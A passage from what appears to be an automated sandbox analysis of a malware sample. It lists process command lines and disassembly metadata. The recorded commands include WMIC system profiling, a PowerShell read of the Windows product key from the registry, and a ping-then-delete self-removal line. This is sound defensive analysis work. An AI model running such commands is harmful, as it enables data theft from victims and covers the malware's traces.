                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:122
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:123
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:124
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:125
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:126
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:127
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:128
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:129
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:130
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:ping localhost -n 3
                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                              File size:18'944 bytes
                                                                                                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 0767837F Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: a[QF
                                                                                                                                                                                                                                • API String ID: 0-4264035995
                                                                                                                                                                                                                                • Opcode ID: 75bd98a36188ad60de02ce91e29ded9cbb8a897b0a3597360a4493265b2987e3
                                                                                                                                                                                                                                • Instruction ID: e94bc172a16018dec85f3ef3a8a13e53a05d3f071712b1c8f388730aae4560a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75bd98a36188ad60de02ce91e29ded9cbb8a897b0a3597360a4493265b2987e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6351333240A2D29FC702CF79D982496BF61FE5331472845DDD4C24F526C360AA2ACB9A
                                                                                                                                                                                                                                Function 0767AF63 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction ID: 759c103369d7cfa834bbe92bcc11580713721db1a42476a1d886747c96ac4210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B851ECF140E7D18FC313CF38D9A5AA6BFA5AE4721531E45CCD4C28F223D2696605CB26
                                                                                                                                                                                                                                Function 0767AF63 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07679000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction ID: 759c103369d7cfa834bbe92bcc11580713721db1a42476a1d886747c96ac4210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B851ECF140E7D18FC313CF38D9A5AA6BFA5AE4721531E45CCD4C28F223D2696605CB26
                                                                                                                                                                                                                                Function 076781F7 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ee1ef64790ae6055115f39cb9d5af3942d76d7a9f41f9193108f7f31350ea5da
                                                                                                                                                                                                                                • Instruction ID: e2978849986332ea1c0e24228df283aefd34652e3d08e523bbdff4d4adbf5781
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee1ef64790ae6055115f39cb9d5af3942d76d7a9f41f9193108f7f31350ea5da
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D2122721092D18FD306CF34D494A927FA2FF8B31639A40DCD9C18F527C2B5A942CB52

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:5.5%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                execution_graph 22038 8eb63a0 22039 8eb63e3 SetThreadToken 22038->22039 22040 8eb6411 22039->22040

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 04E2B551 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1031 4e2b551-4e2b579 1032 4e2b57b 1031->1032 1033 4e2b57e-4e2b8b9 call 4e2aa64 1031->1033 1032->1033 1094 4e2b8be-4e2b8c5 1033->1094
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 37c6e7ceece4e0ce0bab77ca3b4e92aea4cfe7cf386f0a9138f39ac93789d177
                                                                                                                                                                                                                                • Instruction ID: 93ec5c566deaa05d14fe00603a3702c59a2eca93ddea488b2887ca39405b5b04
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37c6e7ceece4e0ce0bab77ca3b4e92aea4cfe7cf386f0a9138f39ac93789d177
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59918471B007245FDB19EFB4C5155AEB7F2EF84608B00891DD44AAB344DF74690ACBE6
                                                                                                                                                                                                                                Function 04E2B560 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1095 4e2b560-4e2b579 1096 4e2b57b 1095->1096 1097 4e2b57e-4e2b8b9 call 4e2aa64 1095->1097 1096->1097 1158 4e2b8be-4e2b8c5 1097->1158
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2a53e64190365676c4837b0696d223af070fe87c4e005693fa96c3755362a5cb
                                                                                                                                                                                                                                • Instruction ID: 3446c0d369f70d44754a2c17f8fae256d1eadb392f5655ce3256ed2fb0cf3c9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a53e64190365676c4837b0696d223af070fe87c4e005693fa96c3755362a5cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93917471B006285BEB19EFB4C5155AEB7E2EF84608B00891DD50AAB344DF746D06CBE6
                                                                                                                                                                                                                                Function 07D42438 Relevance: 13.1, Strings: 10, Instructions: 634COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$JEj$JEj$JEj$JEj$JEj$JEj$rDj$rDj
                                                                                                                                                                                                                                • API String ID: 0-3284929975
                                                                                                                                                                                                                                • Opcode ID: ffeb7e5a5944ec5a0d9838bd115bd894f467301b66959ca63d61b91d2e28c1b0
                                                                                                                                                                                                                                • Instruction ID: 97706f321e5ac6f756e597a9cd88fad281cecaeead2fe2bf20b8a0c1b268ee75
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffeb7e5a5944ec5a0d9838bd115bd894f467301b66959ca63d61b91d2e28c1b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 122228B17002468FDB158F69C840B6AFBE6FF89310F1480AAE955CB351DB35ED85C7A2
                                                                                                                                                                                                                                Function 07D43E18 Relevance: 5.6, Strings: 4, Instructions: 579COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 400 7d43e18-7d43e3d 401 7d44030-7d4407a 400->401 402 7d43e43-7d43e48 400->402 410 7d44080-7d44085 401->410 411 7d441fe-7d44242 401->411 403 7d43e60-7d43e64 402->403 404 7d43e4a-7d43e50 402->404 408 7d43fe0-7d43fea 403->408 409 7d43e6a-7d43e6c 403->409 406 7d43e54-7d43e5e 404->406 407 7d43e52 404->407 406->403 407->403 412 7d43fec-7d43ff5 408->412 413 7d43ff8-7d43ffe 408->413 414 7d43e7c 409->414 415 7d43e6e-7d43e7a 409->415 416 7d44087-7d4408d 410->416 417 7d4409d-7d440a1 410->417 429 7d44358-7d4438d 411->429 430 7d44248-7d4424d 411->430 418 7d44004-7d44010 413->418 419 7d44000-7d44002 413->419 421 7d43e7e-7d43e80 414->421 415->421 423 7d44091-7d4409b 416->423 424 7d4408f 416->424 427 7d440a7-7d440a9 417->427 428 7d441b0-7d441ba 417->428 426 7d44012-7d4402d 418->426 419->426 421->408 422 7d43e86-7d43ea5 421->422 462 7d43eb5 422->462 463 7d43ea7-7d43eb3 422->463 423->417 424->417 432 7d440b9 427->432 433 7d440ab-7d440b7 427->433 434 7d441c7-7d441cd 428->434 435 7d441bc-7d441c4 428->435 454 7d4438f-7d443b1 429->454 455 7d443bb-7d443c5 429->455 442 7d44265-7d44269 430->442 443 7d4424f-7d44255 430->443 436 7d440bb-7d440bd 432->436 433->436 437 7d441d3-7d441df 434->437 438 7d441cf-7d441d1 434->438 436->428 444 7d440c3-7d440e2 436->444 445 7d441e1-7d441fb 437->445 438->445 447 7d4426f-7d44271 442->447 448 7d4430a-7d44314 442->448 449 7d44257 443->449 450 7d44259-7d44263 443->450 484 7d440e4-7d440f0 444->484 485 7d440f2 444->485 456 7d44281 447->456 457 7d44273-7d4427f 447->457 458 7d44316-7d4431e 448->458 459 7d44321-7d44327 448->459 449->442 450->442 496 7d44405-7d4442e 454->496 497 7d443b3-7d443b8 454->497 468 7d443c7-7d443cc 455->468 469 7d443cf-7d443d5 455->469 464 7d44283-7d44285 456->464 457->464 466 7d4432d-7d44339 459->466 467 7d44329-7d4432b 459->467 470 7d43eb7-7d43eb9 462->470 463->470 464->448 472 7d4428b-7d4428d 464->472 473 7d4433b-7d44355 466->473 467->473 474 7d443d7-7d443d9 469->474 475 7d443db-7d443e7 469->475 470->408 477 7d43ebf-7d43ec6 470->477 478 7d442a7-7d442ae 472->478 479 7d4428f-7d44295 472->479 482 7d443e9-7d44402 474->482 475->482 477->401 487 7d43ecc-7d43ed1 477->487 490 7d442c6-7d44307 478->490 491 7d442b0-7d442b6 478->491 488 7d44297 479->488 489 7d44299-7d442a5 479->489 495 7d440f4-7d440f6 484->495 485->495 498 7d43ed3-7d43ed9 487->498 499 7d43ee9-7d43ef8 487->499 488->478 489->478 500 7d442b8 491->500 501 7d442ba-7d442c4 491->501 495->428 503 7d440fc-7d44133 495->503 516 7d44430-7d44456 496->516 517 7d4445d-7d4448c 496->517 504 7d43edd-7d43ee7 498->504 505 7d43edb 498->505 499->408 511 7d43efe-7d43f1c 499->511 500->490 501->490 523 7d44135-7d4413b 503->523 524 7d4414d-7d44154 503->524 504->499 505->499 511->408 527 7d43f22-7d43f47 511->527 516->517 525 7d444c5-7d444cf 517->525 526 7d4448e-7d444ab 517->526 530 7d4413d 523->530 531 7d4413f-7d4414b 523->531 532 7d44156-7d4415c 524->532 533 7d4416c-7d441ad 524->533 528 7d444d1-7d444d5 525->528 529 7d444d8-7d444de 525->529 544 7d44515-7d4451a 526->544 545 7d444ad-7d444bf 526->545 527->408 550 7d43f4d-7d43f54 527->550 537 7d444e4-7d444f0 529->537 538 7d444e0-7d444e2 529->538 530->524 531->524 535 7d44160-7d4416a 532->535 536 7d4415e 532->536 535->533 536->533 543 7d444f2-7d44512 537->543 538->543 544->545 545->525 552 7d43f56-7d43f71 550->552 553 7d43f9a-7d43fcd 550->553 557 7d43f73-7d43f79 552->557 558 7d43f8b-7d43f8f 552->558 564 7d43fd4-7d43fdd 553->564 559 7d43f7d-7d43f89 557->559 560 7d43f7b 557->560 562 7d43f96-7d43f98 558->562 559->558 560->558 562->564
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                                                                                                                • Opcode ID: 2bccd2cbd77eeed369c7b3d7bf29ca6e1e06562c33046f43338995bfd98ad230
                                                                                                                                                                                                                                • Instruction ID: 5df5fb43418ab3d8187831b5991bd99d03d26d8c12a2a923ee6f2301329f9ff7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bccd2cbd77eeed369c7b3d7bf29ca6e1e06562c33046f43338995bfd98ad230
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 621245B1B442958FCB159B68D800B6BFBB2EFD2210F1480BAD955DF251DE32D885C7A2
                                                                                                                                                                                                                                Function 07D418E8 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 569 7d418e8-7d4190a 570 7d41910-7d41915 569->570 571 7d41a99-7d41ae5 569->571 572 7d41917-7d4191d 570->572 573 7d4192d-7d41931 570->573 588 7d41c34-7d41c55 571->588 589 7d41aeb-7d41af0 571->589 574 7d41921-7d4192b 572->574 575 7d4191f 572->575 576 7d41a44-7d41a4e 573->576 577 7d41937-7d4193b 573->577 574->573 575->573 582 7d41a50-7d41a59 576->582 583 7d41a5c-7d41a62 576->583 579 7d4193d-7d4194e 577->579 580 7d4197b 577->580 579->571 596 7d41954-7d41959 579->596 584 7d4197d-7d4197f 580->584 585 7d41a64-7d41a66 583->585 586 7d41a68-7d41a74 583->586 584->576 594 7d41985-7d41989 584->594 590 7d41a76-7d41a96 585->590 586->590 606 7d41c57-7d41c64 588->606 607 7d41bfe-7d41c02 588->607 592 7d41af2-7d41af8 589->592 593 7d41b08-7d41b0c 589->593 598 7d41afc-7d41b06 592->598 599 7d41afa 592->599 600 7d41be4-7d41bee 593->600 601 7d41b12-7d41b14 593->601 594->576 602 7d4198f-7d41993 594->602 604 7d41971-7d41979 596->604 605 7d4195b-7d41961 596->605 598->593 599->593 608 7d41bf0-7d41bf9 600->608 609 7d41bfc 600->609 610 7d41b24 601->610 611 7d41b16-7d41b22 601->611 612 7d41995-7d4199e 602->612 613 7d419b6 602->613 604->584 616 7d41965-7d4196f 605->616 617 7d41963 605->617 619 7d41c74 606->619 620 7d41c66-7d41c72 606->620 621 7d41c03-7d41c06 607->621 622 7d41c08-7d41c14 607->622 609->607 615 7d41b26-7d41b28 610->615 611->615 623 7d419a5-7d419b2 612->623 624 7d419a0-7d419a3 612->624 618 7d419b9-7d41a41 613->618 615->600 627 7d41b2e-7d41b46 615->627 616->604 617->604 626 7d41c76-7d41c78 619->626 620->626 628 7d41c16-7d41c31 621->628 622->628 629 7d419b4 623->629 624->629 634 7d41cac-7d41cb6 626->634 635 7d41c7a-7d41c80 626->635 642 7d41b60-7d41b64 627->642 643 7d41b48-7d41b4e 627->643 629->618 638 7d41cc0-7d41cc6 634->638 639 7d41cb8-7d41cbd 634->639 640 7d41c82-7d41c84 635->640 641 7d41c8e-7d41ca9 635->641 645 7d41ccc-7d41cd8 638->645 646 7d41cc8-7d41cca 638->646 640->641 653 7d41b6a-7d41b71 642->653 647 7d41b50 643->647 648 7d41b52-7d41b5e 643->648 652 7d41cda-7d41cf1 645->652 646->652 647->642 648->642 656 7d41b73-7d41b76 653->656 657 7d41b78-7d41bd5 653->657 659 7d41bda-7d41be1 656->659 657->659
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :j$:j
                                                                                                                                                                                                                                • API String ID: 0-4217653984
                                                                                                                                                                                                                                • Opcode ID: 9c2f3db2bbd7cd4d3eb37ed531fd9fa7de03d74b76d24f3611d4d373a6b9202d
                                                                                                                                                                                                                                • Instruction ID: ca5ffa35a2a6d714a60a4fbf0e8763e1e10ce04dea69545f9fa6115b48facebd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c2f3db2bbd7cd4d3eb37ed531fd9fa7de03d74b76d24f3611d4d373a6b9202d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B148B1B042599FDB148BA9D8006AAFBE2EFC6210F18C0BAD555CB351DB32DD85C7A1
                                                                                                                                                                                                                                Function 08EB6398 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 668 8eb6398-8eb63db 669 8eb63e3-8eb640f SetThreadToken 668->669 670 8eb6418-8eb6435 669->670 671 8eb6411-8eb6417 669->671 671->670
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(EE340896), ref: 08EB6402
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2559905641.0000000008EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_8eb0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3254676861-0
                                                                                                                                                                                                                                • Opcode ID: 7194726fda64a2fc51174a7d997fb4f9be648ee535f2d38910f2f4e31675a9b3
                                                                                                                                                                                                                                • Instruction ID: 5dd2b8d85b595874ad6dd399af042e3d1077f88ff4eb7213d2a92f8f1b9d5da9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7194726fda64a2fc51174a7d997fb4f9be648ee535f2d38910f2f4e31675a9b3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 921104B59002598FCB10DF99D944BDEFBF4AB88324F148429D459A7260C775A944CFA1
                                                                                                                                                                                                                                Function 08EB63A0 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 674 8eb63a0-8eb640f SetThreadToken 676 8eb6418-8eb6435 674->676 677 8eb6411-8eb6417 674->677 677->676
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(EE340896), ref: 08EB6402
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2559905641.0000000008EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_8eb0000_powershell.jbxd
